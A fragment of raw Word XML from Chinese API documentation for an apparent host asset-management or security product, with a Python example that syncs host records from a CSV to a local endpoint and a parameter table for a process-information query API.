          <w:p w14:paraId="707B7FBF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(24)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4CE0B181" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>字符“success”或"fail"</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0CEC613C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>代码示例(python)：</w:t>
      </w:r>
      <w:r>
        <w:t>主机信息同步</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="635AFC35" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>#! /usr/bin/env python</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t># -*- coding: utf-8 -*-</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>"""</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">  该脚本实现的功能：把.csv文件读取数据，并拼接为insert_data，把insert_data,通过调用外部接口external/api/assets/host/hostInfoSync，把数据同步到mongo数据库中</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">  脚本使用的方法：</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">  　　　１、在当前目录放.csv文件，csv文件的列为</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">  　　　２、安装相关依赖包，执行python endscripts.py即可</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>"""</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>import sys</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>import csv</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>import os</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>import glob</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>import requests</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>import json</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>import httplib</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>import time</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>import hashlib</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>defaultencoding = 'utf-8'</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>if sys.getdefaultencoding() != defaultencoding:</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    reload(sys)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    sys.setdefaultencoding(defaultencoding)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>host = "127.0.0.1"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>port = 80</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>comId = "xxx"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>osType = 1</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>choiceType = 1</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t># 数据集绝对路径以及文件名称</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>csvx_list = glob.glob('*.csv')</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>host_file = sys.path[0] + '/'+ csvx_list[0]</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>url = 'http://%s:%s/external/api/assets/host/hostInfoSync'%(host, port)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t># 登录请求调用示例</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>def login():</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    conn = httplib.HTTPConnection(host, port)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    url = "http://%s:%s/v1/api/auth" % (host, port)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    header = {"Content-Type": "application/json"}</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    body = {"username": "dev@xx.com", "password": "abc@123"}</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    json_body = json.dumps(body)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    conn.request(method="POST", url=url, body=json_body, headers=header)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    response = conn.getresponse()</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    res = response.read()</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    return json.loads(res)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t># 发送请求</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>def send_request(method, url, data):</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    # 参看登录认证里面的登录方法代码示例</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    login_result = login()</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    sign_key = login_result.get("data").get("signKey")</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    jwt = login_result.get("data").get("jwt")</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    comid = login_result.get("data").get("comId")</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    # 当前时间戳</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    ts = int(time.time())</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    if data is not None:</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        info = ""</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        if method == "GET":</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            # 对参数key进行字典排序</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            keys = sorted(data.keys())</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            for key in keys:</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                info = info + key + str(data.get(key))</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        elif method == "POST" or method == "PUT" or method == "DELETE":</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            info = json.dumps(data)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        # 拼接待签名字符串</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        to_sign = comid + info + str(ts) + sign_key</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    else:</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        # 拼接待签名字符串</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        to_sign = comid + str(ts) + sign_key</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    # 对待签名字符串进行sha1得到签名字符串</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    sign = hashlib.sha1(to_sign).hexdigest()</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    # 组装http请求头参数</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    header = {"Content-Type": "application/json", "comId": comid, "timestamp": ts,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">              "sign": sign, "Authorization": "Bearer " + jwt}</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    conn = httplib.HTTPConnection(host, port)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    conn.request(method=method, url=url, body=json.dumps(data), headers=header)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    response = conn.getresponse()</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    res = response.read()</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    return res</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>def import_csv():</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    if not os.path.exists(host_file):</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        return</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    insert_data = {}</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    #从csv中获取待插入mongodb的数据insert_data</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    with open(host_file,'rb') as csvfile:</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        csv_reader = csv.reader(csvfile)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        host_header = next(csv_reader)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        for row in csv_reader:</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            insert_data = {"hostIp":row[0],"hostname":row[1],"assetLevel":row[2], "chargeName":row[3], "chargeEmail":row[4],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "hostLocation":row[5],"assetNumber":row[6], "hostTagName":row[7],"remark":row[8], "osType":osType, "type":choiceType, "comId":comId}</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            res = send_request("POST", url, insert_data)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>if __name__ == "__main__":</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    print "start"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    import_csv()</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    print "done"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="348A6D0C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="20" w:name="进程信息"/>
      <w:bookmarkEnd w:id="15"/>
      <w:bookmarkEnd w:id="19"/>
      <w:r>
        <w:t>进程信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D863F80" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>功能描述</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="623ED8AE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>该功能API用于查询资产中的进程信息，获取查询的结果并展示；每条数据均包含主机信息，您可以灵活的使用该API组合出任何需要的显示结果。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="200B7A7B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>功能使用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73669068" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>进程信息查询有两种方式：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40BEC9D0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>直接获取当前信息；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7250F6EB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>更新数据后，再获取最新信息。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="271D84B7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>为了满足上述功能，我们提供了三个接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32793753" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>进程信息查询结果</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F4C32A2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>进程信息扫描</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="593F55A1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>进程信息查询扫描状态</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DC4E72A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>使用方法如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35E522C1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>直接查询当前信息则直接调用进程信息查询结果接口（即1号接口）；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3273208E"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05B4A448" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>接口的调用方法、参数和返回信息等具体如下所示。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E0F1693" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="21" w:name="进程信息查询结果"/>
      <w:r>
        <w:t>进程信息查询结果</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23E1FCFD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>该接口用于查询进程信息，按每台主机每个进程进行展示；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FB34BDB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C71D126" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>GET /external/api/assets/process/{linux|win}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05716850"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841"/>
        <w:gridCol w:w="1232"/>
        <w:gridCol w:w="564"/>
        <w:gridCol w:w="6445"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="7A12D83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ABB7FCE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3622EB43" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="74A8329E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="73AAC9F6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="534404A7" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3FFE1EA2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>agentId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="12EA068B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3709C63B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0D06A712" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>唯一标识Agent的ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="5AAD8625" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="73734D76" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>groups</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="296F9D0F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="39E8FF39" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3A93FF14" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>业务组ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="52027347" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4E001826" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>hostname</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="74AB5A6B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6CB8BB4C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="05F63957" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机名（模糊查询）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="7B112CF2" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="430D5F3B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>ip</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="730B3E9C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="116DE142" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3F675ABF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机IP（模糊查询）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="07E7E4C1" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5CF63EC4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>startTime</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6DD2D2F8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4BF47844" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7CB6B26C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>进程启动时间</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="6E61A74D" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="663F7BFB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>versions</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2C842B0B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="65741D2F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="32908C43" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>版本，仅windows可用</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="464042CD" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="335C2152" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>root</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="70771370" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Boolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2331A8EC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="432A3BAD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>是否root权限运行，仅linux可用</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="39C2A592" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2A4F7BFB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>packageName</w:t>
            </w:r>
          </w:p>
        </w:tc>
